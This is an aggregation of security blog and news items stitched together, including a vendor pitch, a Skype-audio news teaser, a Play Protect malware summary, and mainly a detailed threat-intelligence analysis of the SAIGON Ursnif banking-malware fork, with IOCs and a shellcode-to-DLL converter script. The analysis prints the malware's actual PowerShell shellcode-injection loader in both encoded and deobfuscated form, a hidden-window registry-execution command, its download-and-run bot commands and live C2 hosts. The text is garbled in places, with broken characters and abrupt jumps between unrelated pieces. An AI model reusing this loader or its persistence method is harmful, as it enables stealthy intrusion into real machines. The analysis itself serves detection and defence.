Additionally, 99 percent of those surveyed for the report welcome the advantages of working with a certified and secure vendor, such as improved protection of IP data that leads to peace of mind for their customers. There are measures your organization can take to boost customer confidence, give you a competitive advantage, and potentially prevent the loss (monetary or otherwise) from a breach or cyberattack.

In addition to incorporating security testing into your software development, third-party validation of your security efforts shows prospects and customers alike that securing data is a top priority in your organization???s application development process.

Independent security validation comes with a number of benefits, enabling vendors to:

  • Proactively address any questions a prospect might have about security
  • Instill confidence in buyers that they???re choosing a vendor who cares about their data
  • Speed up sales cycles by eliminating the need for back-and-forth validation
  • Stay one step ahead of security concerns from customers and prospects
  • Integrate more efficiently with development teams to improve security

With third-party validation in place, you not only have proof positive that your organization cares about security, but also a roadmap for maturing your application security program. The risk of losing employees to high-profile incidents also diminishes. Eliminating concern and doubt sets you apart with a competitive advantage in the marketplace that sends a clear message to buyers: you???re serious about security.ツ?ツ?

Learn how the Veracode Verified program can help position you as a trusted and secure vendor so that you???re ready when a prospect comes calling.

Skype audio graded by workers in China with ‘no security measures’

Exclusive: former Microsoft contractor says he was emailed login after minimal vetting

A Microsoft programme to transcribe and vet audio from Skype and Cortana, its voice assistant, ran for years with “no security measures”, according to a former contractor who says he reviewed thousands of potentially sensitive recordings on his personal laptop from his home in Beijing over the two years he worked for the company.

The recordings, both deliberate and accidentally invoked activations of the voice assistant, as well as some Skype phone calls, were simply accessed by Microsoft workers through a web app running in Google’s Chrome browser, on their personal laptops, over the Chinese internet, according to the contractor.

Continue reading...

PHA Family Highlights: Bread (and Friends)





“So..good..”
“very beautiful”
Later, 1 star reviews from real users start appearing with comments like:
“Deception”
“The app is not honest …”

SUMMARY

Sheer volume appears to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings.
At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device.

SELECTED SAMPLES

Package Name SHA-256 Digest
com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f
org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26
com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09
com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5
com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86
com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131
com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68
com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b

SAIGON, the Mysterious Ursnif Fork

Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. While the first major version of Ursnif was identified in 2006, several subsequent versions have been released in large part due source code leaks. FireEye reported on a previously unidentified variant of the Ursnif malware family to our threat intelligence subscribers in September 2019 after identification of a server that hosted a collection of tools, which included multiple point-of-sale malware families. This malware self-identified as "SaiGon version 3.50 rev 132," and our analysis suggests it is likely based on the source code of the v3 (RM3) variant of Ursnif. Notably, rather than being a full-fledged banking malware, SAIGON's capabilities suggest it is a more generic backdoor, perhaps tailored for use in targeted cybercrime operations.

Technical Analysis

Behavior

SAIGON appears on an infected computer as a Base64-encoded shellcode blob stored in a registry key, which is launched using PowerShell via a scheduled task. As with other Ursnif variants, the main component of the malware is a DLL file. This DLL has a single exported function, DllRegisterServer, which is an unused empty function. All the relevant functionality of the malware executes when the DLL is loaded and initialized via its entry point.

Upon initial execution, the malware generates a machine ID using the creation timestamp of either %SystemDrive%\pagefile.sys or %SystemDrive%\hiberfil.sys (whichever is identified first). Interestingly, the system drive is queried in a somewhat uncommon way, directly from the KUSER_SHARED_DATA structure (via SharedUserData→NtSystemRoot). KUSER_SHARED_DATA is a structure located in a special part of kernel memory that is mapped into the memory space of all user-mode processes (thus shared), and always located at a fixed memory address (0x7ffe0000, pointed to by the SharedUserData symbol).

The code then looks for the current shell process by using a call to GetWindowThreadProcessId(GetShellWindow(), …). The code also features a special check; if the checksum calculated from the name of the shell's parent process matches the checksum of explorer.exe (0xc3c07cf0), it will attempt to inject into the parent process instead.

SAIGON then injects into this process using the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread combination of functions. Once this process is injected, it loads two embedded files from within its binary:

  • A PUBLIC.KEY file, which is used to verify and decrypt other embedded files and data coming from the malware's command and control (C2) server
  • A RUN.PS1 file, which is a PowerShell loader script template that contains a "@SOURCE@" placeholder within the script:

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("JHdneG1qZ2J4dGo9JGh
hbmtzZWZrc2d1Lkxlbmd0aDskdHNrdm89IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF
0aWMgZXh0ZXJuIEludDMyIEdldEN1cnJlbnRQcm9jZXNzKCk7YG5bRGxsSW1wb3J0KGAidXNlcjMyYCIpXWB
ucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldERDKEludFB0ciBteHhhaHhvZik7YG5bRGxsSW1wb3J0K
GAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlUmVtb3RlVGhyZWFkKEl
udFB0ciBoY3d5bHJicywgSW50UHRyIHdxZXIsdWludCBzZmosSW50UHRyIHdsbGV2LEludFB0ciB3d2RyaWN
0d2RrLHVpbnQga2xtaG5zayxJbnRQdHIgdmNleHN1YWx3aGgpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCI
pXWBucHVibGljIHN0YXRpYyBleHRlcm4gVUludDMyIFdhaXRGb3JTaW5nbGVPYmplY3QoSW50UHRyIGFqLC
BVSW50MzIga2R4c3hldik7YG5bRGxsSW1wb3J0KGAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dG
VybiBJbnRQdHIgVmlydHVhbEFsbG9jKEludFB0ciB4eSx1aW50IGtuYnQsdWludCB0bXJ5d2h1LHVpbnQgd2d1
dHVkKTsiOyR0c2thYXhvdHhlPUFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR0c2t2byAtTmFtZSAnV2luMzI
nIC1uYW1lc3BhY2UgV2luMzJGdW5jdGlvbnMgLXBhc3N0aHJ1OyRtaHhrcHVsbD0kdHNrYWF4b3R4ZTo6Vml
ydHVhbEFsbG9jKDAsJHdneG1qZ2J4dGosMHgzMDAwLDB4NDApO1tTeXN0ZW0uUnVudGltZS5JbnRlcm9wU
2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGhhbmtzZWZrc2d1LDAsJG1oeGtwdWxsLCR3Z3htamdieHRqKTskd
GRvY25ud2t2b3E9JHRza2FheG90eGU6OkNyZWF0ZVJlbW90ZVRocmVhZCgtMSwwLDAsJG1oeGtwdWxsLC
RtaHhrcHVsbCwwLDApOyRvY3h4am1oaXltPSR0c2thYXhvdHhlOjpXYWl0Rm9yU2luZ2xlT2JqZWN0KCR0ZG
9jbm53a3ZvcSwzMDAwMCk7")));

The malware replaces the "@SOURCE@" placeholder from this PowerShell script template with a Base64-encoded version of itself, and writes the PowerShell script to a registry value named "PsRun" under the "HKEY_CURRENT_USER\Identities\{<random_guid>}" registry key (Figure 1).


Figure 1: PowerShell script written to PsRun

The instance of SAIGON then creates a new scheduled task (Figure 2) with the name "Power<random_word>" (e.g. PowerSgs). If this is unsuccessful for any reason, it falls back to using the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key to enable itself to maintain persistence through system reboot.


Figure 2: Scheduled task

Regardless of the persistence mechanism used, the command that executes the binary from the registry is similar to the following:

PowerShell.exe -windowstyle hidden -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA
OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5
AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A

After removing the Base64 encoding from this command, it looks something like "iex (gp 'HKCU:\\Identities\\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun."  When executed, this command retrieves the contents of the previous registry value using Get-ItemProperty (gp) and executes it using Invoke-Expression (iex).

Finally, the PowerShell code in the registry allocates a block of memory, copies the Base64-decoded shellcode blob into it, launches a new thread pointing to the area using CreateRemoteThread, and waits for the thread to complete. The following script is a deobfuscated and beautified version of the PowerShell.

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
$wgxmjgbxtj = $hanksefksgu.Length;

$tskvo = @"
[DllImport("kernel32")]
public static extern Int32 GetCurrentProcess();

[DllImport("user32")]
public static extern IntPtr GetDC(IntPtr mxxahxof);

[DllImport("kernel32")]
public static extern IntPtr CreateRemoteThread(IntPtr hcwylrbs, IntPtr wqer, uint sfj, IntPtr wllev, IntPtr wwdrictwdk, uint klmhnsk, IntPtr vcexsualwhh);

[DllImport("kernel32")]
public static extern UInt32 WaitForSingleObject(IntPtr aj, UInt32 kdxsxev);

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr xy, uint knbt, uint tmrywhu, uint wgutud);
"@;

$tskaaxotxe = Add-Type -memberDefinition $tskvo -Name 'Win32' -namespace Win32Functions -passthru;
$mhxkpull = $tskaaxotxe::VirtualAlloc(0, $wgxmjgbxtj, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($hanksefksgu, 0, $mhxkpull, $wgxmjgbxtj);
$tdocnnwkvoq = $tskaaxotxe::CreateRemoteThread(-1, 0, 0, $mhxkpull, $mhxkpull, 0, 0);
$ocxxjmhiym = $tskaaxotxe::WaitForSingleObject($tdocnnwkvoq, 30000);

Once it has established a foothold on the machine, SAIGON loads and parses its embedded LOADER.INI configuration (see the Configuration section for details) and starts its main worker thread, which continuously polls the C2 server for commands.

Configuration

The Ursnif source code incorporated a concept referred to as "joined data," which is a set of compressed/encrypted files bundled with the executable file. Early variants relied on a special structure after the PE header and marked with specific magic bytes ("JF," "FJ," "J1," "JJ," depending on the Ursnif version). In Ursnif v3 (Figure 3), this data is no longer simply after the PE header but pointed to by the Security Directory in the PE header, and the magic bytes have also been changed to "WD" (0x4457).


Figure 3: Ursnif v3 joined data

This structure defines the various properties (offset, size, and type) of the bundled files. This is the same exact method used by SAIGON for storing its three embedded files:

  • PUBLIC.KEY - RSA public key
  • RUN.PS1 - PowerShell script template
  • LOADER.INI - Malware configuration

The following is a list of configuration options observed:

Name Checksum

Name

Description

0x97ccd204

HostsList

List of C2 URLs used for communication

0xd82bcb60

ServerKey

Serpent key used for communicating with the C2

0x23a02904

Group

Botnet ID

0x776c71c0

IdlePeriod

Number of seconds to wait before the initial request to the C2

0x22aa2818

MinimumUptime

Waits until the uptime is greater than this value (in seconds)

0x5beb543e

LoadPeriod

Number of seconds to wait between subsequent requests to the C2

0x84485ef2

HostKeepTime

The number of minutes to wait before switching to the next C2 server in case of failures

Table 1: Configuration options

Communication

While the network communication structure of SAIGON is very similar to Ursnif v3, there are some subtle differences. SAIGON beacons are sent to the C2 servers as multipart/form-data encoded requests via HTTP POST to the "/index.html" URL path. The payload to be sent is first encrypted using Serpent encryption (in ECB mode vs CBC mode), then Base64-encoded. Responses from the server are encrypted with the same Serpent key and signed with the server's RSA private key.

SAIGON uses the following User-Agent header in its HTTP requests: "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0," where <os_version> consists of the operating system's major and minor version number (e.g. 10.0 on Windows 10, and 6.1 on Windows 7) and the string "; Win64; x64" is appended when the operating system is 64-bit. This yields the following example User Agent strings:

  • "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 10 64-bit
  • "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 7 32-bit

The request format is also somewhat similar to the one used by other Ursnif variants described in Table 2:

ver=%u&group=%u&id=%08x%08x%08x%08x&type=%u&uptime=%u&knock=%u

Name

Description

ver

Bot version (unlike other Ursnif variants this only contains the build number, so only the xxx digits from "3.5.xxx")

group

Botnet ID

id

Client ID

type

Request type (0 – when polling for tasks, 6 – for system info data uploads)

uptime

Machine uptime in seconds

knock

The bot "knock" period (number of seconds to wait between subsequent requests to the C2, see the LoadPeriod configuration option)

Table 2: Request format components

Capabilities

SAIGON implements the bot commands described in Table 3.

Name Checksum

Name

Description

0x45d4bf54

SELF_DELETE

Uninstalls itself from the machine; removes scheduled task and deletes its registry key

0xd86c3bdc

LOAD_UPDATE

Download data from URL, decrypt and verify signature, save it as a .ps1 file and run it using "PowerShell.exe -ep unrestricted -file %s"

0xeac44e42

GET_SYSINFO

Collects and uploads system information by running:

  1. "systeminfo.exe"
  2. "net view"
  3. "nslookup 127.0.0.1"
  4. "tasklist.exe /SVC"
  5. "driverquery.exe"
  6. "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s"

0x83bf8ea0

LOAD_DLL

Download data from URL, decrypt and verify, then use the same shellcode loader that was used to load itself into memory to load the DLL into the current process

0xa8e78c43

LOAD_EXE

Download data from URL, decrypt and verify, save with an .exe extension, invoke using ShellExecute

Table 3: SAIGON bot commands

Comparison to Ursnif v3

Table 4 shows the similarities between Ursnif v3 and the analyzed SAIGON samples (differences are highlighted in bold):

 

Ursnif v3 (RM3)

Saigon (Ursnif v3.5?)

Persistence method

Scheduled task that executes code stored in a registry key using PowerShell

Scheduled task that executes code stored in a registry key using PowerShell

Configuration storage

Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

Security PE directory points to embedded binary data starting with 'WD' magic bytes (aka. Ursnif "joined files")

PRNG algorithm

xorshift64*

xorshift64*

Checksum algorithm

JAMCRC (aka. CRC32 with all the bits flipped)

CRC32, with the result rotated to the right by 1 bit

Data compression

aPLib

aPLib

Encryption/Decryption

Serpent CBC

Serpent ECB

Data integrity verification

RSA signature

RSA signature

Communication method

HTTP POST requests

HTTP POST requests

Payload encoding

Unpadded Base64 ('+' and '/' are replaced with '_2B' and '_2F' respectively), random slashes are added

Unpadded Base64 ('+' and '/' are replaced with '%2B' and '%2F' respectively), no random slashes

Uses URL path mimicking?

Yes

No

Uses PX file format?

Yes

No

Table 4: Similarities and differences between Ursnif v3 and SAIGON samples

Figure 4 shows Ursnif v3's use of URL path mimicking. This tactic has not been seen in other Ursnif variants, including SAIGON.


Figure 4: Ursnif v3 mimicking (red) previously seen benign browser traffic (green) not seen in SAIGON samples 

Implications

It is currently unclear whether SAIGON is representative of a broader evolution in the Ursnif malware ecosystem. The low number of SAIGON samples identified thus far—all of which have compilations timestamps in 2018—may suggest that SAIGON was a temporary branch of Ursnif v3 adapted for use in a small number of operations. Notably, SAIGON’s capabilities also distinguish it from typical banking malware and may be more suited toward supporting targeted intrusion operations. This is further supported via our prior identification of SAIGON on a server that hosted tools used in point-of-sale intrusion operations as well as VISA’s recent notification of the malware appearing on a compromised hospitality organization’s network along with tools previously used by FIN8.

Acknowledgements

The authors would like to thank Kimberly Goody, Jeremy Kennelly and James Wyke for their support on this blog post.

Appendix A: Samples

The following is a list of samples including their embedded configuration:

Sample SHA256: 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:30
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:41
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e
Sample Version: 3.50.199
PE Timestamp: 2018-11-15T11:17:09
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com

Group / Botnet ID: 1000
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 60
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b15
02ccb5c021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f5
93518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9
Sample Version: 3.50.209
PE Timestamp: 2018-12-04T10:47:56
XOR Cookie: 0x40d822d9
C2 URLs

  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

Botnet ID: 1000
Server Key: 0123456789ABCDEF
Idle Period: 20
Minimum Uptime: 300
Load Period: 1800
Host Keep Time: 360
RSA Public Key: (0xdb7c3a9ea68fbaf5ba1aebc782be3a9e75b92e677a114b52840d2bbafa8ca49da40a64664d80cd62d9453
34f8457815dd6e75cffa5ee33ae486cb6ea1ddb88411d97d5937ba597e5c430a60eac882d8207618d14b660
70ee8137b4beb8ecf348ef247ddbd23f9b375bb64017a5607cb3849dc9b7a17d110ea613dc51e9d2aded, 0x10001)

Appendix B: IOCs

Sample hashes:

  • 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
  • c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
  • 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e [VT]
  • 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9 [VT]

C2 servers:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com
  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com
  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

User-Agent:

  • "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0"

Other host-based indicators:

  • "Power<random_string>" scheduled task
  • "PsRun" value under the HKCU\Identities\{<random_guid>} registry key

Appendix C: Shellcode Converter Script

The following Python script is intended to ease analysis of this malware. This script converts the SAIGON shellcode blob back into its original DLL form by removing the PE loader and restoring its PE header. These changes make the analysis of SAIGON shellcode blobs much simpler (e.g. allow loading of the files in IDA), however, the created DLLs will still crash when run in a debugger as the malware still relies on its (now removed) PE loader during the process injection stage of its execution. After this conversion process, the sample is relatively easy to analyze due to its small size and because it is not obfuscated.

#!/usr/bin/env python3
import argparse
import struct
from datetime import datetime

MZ_HEADER = bytes.fromhex(
    '4d5a90000300000004000000ffff0000'
    'b8000000000000004000000000000000'
    '00000000000000000000000000000000'
    '00000000000000000000000080000000'
    '0e1fba0e00b409cd21b8014ccd215468'
    '69732070726f6772616d2063616e6e6f'
    '742062652072756e20696e20444f5320'
    '6d6f64652e0d0d0a2400000000000000'
)

def main():
    parser = argparse.ArgumentParser(description="Shellcode to PE converter for the Saigon malware family.")
    parser.add_argument("sample")
    args = parser.parse_args()

    with open(args.sample, "rb") as f:
        data = bytearray(f.read())

    if data.startswith(b'MZ'):
        lfanew = struct.unpack_from('=I', data, 0x3c)[0]
        print('This is already an MZ/PE file.')
        return
    elif not data.startswith(b'\xe9'):
        print('Unknown file type.')
        return

    struct.pack_into('=I', data, 0, 0x00004550)
    if data[5] == 0x01:
        struct.pack_into('=H', data, 4, 0x14c)
    elif data[5] == 0x86:
        struct.pack_into('=H', data, 4, 0x8664)
    else:
        print('Unknown architecture.')
        return

    # file alignment
    struct.pack_into('=I', data, 0x3c, 0x200)

    optional_header_size, _ = struct.unpack_from('=HH', data, 0x14)
    magic, _, _, size_of_code = struct.unpack_from('=HBBI', data, 0x18)
    print('Magic:', hex(magic))
    print('Size of code:', hex(size_of_code))

    base_of_code, base_of_data = struct.unpack_from('=II', data, 0x2c)

    if magic == 0x20b:
        # base of data, does not exist in PE32+
        if size_of_code & 0x0fff:
            tmp = (size_of_code & 0xfffff000) + 0x1000
        else:
            tmp = size_of_code
        base_of_data = base_of_code + tmp

    print('Base of code:', hex(base_of_code))
    print('Base of data:', hex(base_of_data))

    data[0x18 + optional_header_size : 0x1000] = b'\0' * (0x1000 - 0x18 - optional_header_size)

    size_of_header = struct.unpack_from('=I', data, 0x54)[0]

    data_size = 0x3000
    pos = data.find(struct.pack('=IIIII', 3, 5, 7, 11, 13))
    if pos >= 0:
        data_size = pos - base_of_data

    section = 0
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.text',
        size_of_code, base_of_code,
        base_of_data - base_of_code, size_of_header,
        0, 0,
        0, 0,
        0x60000020
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.rdata',
        data_size, base_of_data,
        data_size, size_of_header + base_of_data - base_of_code,
        0, 0,
        0, 0,
        0x40000040
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.data',
        0x1000, base_of_data + data_size,
        0x1000, size_of_header + base_of_data - base_of_code + data_size,
        0, 0,
        0, 0,
        0xc0000040
    )

    if magic == 0x20b:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.pdata',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0x40000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1600, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0xc0000040
        )
    else:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0xc0000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.reloc',
            0x2000, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0x40000040
        )

    header = MZ_HEADER + data[:size_of_header - len(MZ_HEADER)]
    pe = bytearray(header + data[0x1000:])
    with open(args.sample + '.dll', 'wb') as f:
        f.write(pe)

    lfanew = struct.unpack_from('=I', pe, 0x3c)[0]
    timestamp = struct.unpack_from('=I', pe, lfanew + 8)[0]
    print('PE timestamp:', datetime.utcfromtimestamp(timestamp).isoformat())

 

if __name__ == "__main__":
    main()

Did You Read Our Most Popular 2019 Blog Posts?

What were your biggest AppSec questions and concerns in 2019? Want to find out what others??? were? Every January, we look at the most-read blog posts from the previous year, and it always proves to be a valuable exercise for us, and we hope for you as well. The posts below were favorites among our readers in 2019 and highlight the software security issues that were top of mind. Their popularity could also stem from the very practical advice they contain; we got the message, look for more of the same in 2020!

Detailed information on vulnerabilities and exploits ??? and how to prevent and avoid

The blog posts below contain detailed explanations of vulnerabilities and exploits from our own research team and penetration testers. Clearly, there is an appetite for a first-hand closer look at how developers are creating vulnerabilities, and how attackers are exploiting them.

Exploiting Spring Boot Actuators

Exploiting JNDI Injections in Java

Data Extraction to Command Execution CSV Injection

The Top Five Web Application Authentication Vulnerabilities We Find

Managing open source risk

As in the past several years, blog posts on open source risk, and how Veracode helps to reduce it, landed in the top 10.

Introducing New Veracode Software Composition Analysis

How Veracode Scans Docker Containers for Open Source Vulnerabilities

Complying with AppSec regulations

As major data breaches continue to expose customers??? sensitive data and cause major monetary and reputation damage to organizations, regulators are taking notice. From the EU General Data Protection Regulation (EU GDPR) to the NY State Department of Financial Services (NY DFS) Cybersecurity Regulations, more regulations are including application security requirements, and complying with them is becoming a major driver for security professionals. In turn, two blog posts about cybersecurity regulations were featured on the most-read list for 2019.

PCI Releases Software Security Framework

Ohio Senate Bill 220 Incentivizes Businesses to Maintain Higher Levels of Cybersecurity

Subscribe to our content

Did you miss any of these posts last year? Don???t miss a thing in 2020; subscribe to our content.

NICE Released the Winter 2019-20 eNewsletter

The Winter 2019-20 NICE eNewsletter has been published to provide subscribers information on academic, industry, and government developments related to the National Initiative for Cybersecurity Education (NICE), updates from key NICE programs, projects, the NICE Working Group, and other important news. To help increase the visibility of NICE, the NICE Program Office will issue regular eNewsletters that feature spotlight articles on academic, industry, and government developments related to NICE, updates from key NICE programs, projects, the NICE Working Group, and other important news. For

Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020

From the Lifx Switch smart switch to the Charmin RollBot to Kohler Setra Alexa-connected faucets, CES 2020 has introduced new devices aimed at making consumers lives easier. With so much excitement and hype around these new gadgets, however, it can be challenging to make security a top priority. That’s why McAfee is urging users to keep cybersecurity top-of-mind when bringing these new devices into their home so they can protect what matters.

New McAfee research reveals that consumer perceptions of security accountability have shifted in the last couple of years. For example, the majority of Americans today (63%) stated that they as the consumer are responsible for their security while last year only 42% of Americans felt that they are responsible. This shows that users are becoming increasingly aware of how to ensure that they are protecting their privacy and identity. This year-over-year increase could likely be attributed to more Americans becoming aware of online risks, as 48% think it’s likely to happen to them. Additionally, 65% are concerned about the security of connected devices installed in their homes, such as the Chamberlain MyQ Hub garage door opener and the McLear Smart Ring. While these devices are convenient, the McAfee Advanced Threat Research team recently revealed they contained security flaws that could allow a hacker to enter a victim’s home.

It’s important to recognize that security is a proactive effort that should be seamlessly integrated into everyday life. So, how can consumers take charge and feel confident bringing new technology into their homes while staying safe? Check out the following tips to keep in mind as our lives continue to be more connected:

  • The little things count. Hackers don’t have to be geniuses to steal your personal information. Minor habits like changing default passwords and using unique passwords can go a long way to prevent your personal information from being stolen.
  • Do your research. Look up products and their manufacturers before making a purchase. This could save you from buying a device with a known security vulnerability. If you find a manufacturer doesn’t have a history of taking security seriously, then it’s best to avoid it.
  • Use a comprehensive security solution. Use comprehensive security protection, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which can help identify malicious websites.
  • Update, update, update. When applications on your devices need updating, be sure to do it as soon as possible. Most of these updates include security patches to vulnerabilities.

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Survey Methodology

McAfee commissioned 3Gem to conduct a survey of 1,000 adults in the US who regularly use electronic devices, such as phones and laptops.

The post Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020 appeared first on McAfee Blogs.

Iran Cyber Threat Update

Recent political tensions in the Middle East region have led to significant speculation of increased cyber-related activities. McAfee is on a heightened state of alert to monitor the evolving threats and rapidly implement coverage across all McAfee products as intelligence becomes available. Known campaigns associated with the threat actors from this region were integrated into our products and we continue to monitor our global telemetry for any further activity.

Current activity

We are observing activity that claim to be attributed from threat actors from this region, however, distinguishing attribution between cybercrime and nation state will be crucial since the line will likely blur. For example, typical cybercrime activities such as ransomware, or indeed defacements or DDoS, could well be a mask for nation-state activities.

The post Iran Cyber Threat Update appeared first on McAfee Blogs.

Work in Healthcare? This is Why You Should Give Your Security a Checkup

Most patients practice preventative care through regular trips to the doctor, catching minor issues before they turn into major medical problems. So, why don???t more organizations follow suit with security testing to prevent breaches and fortify the safety of patient information?

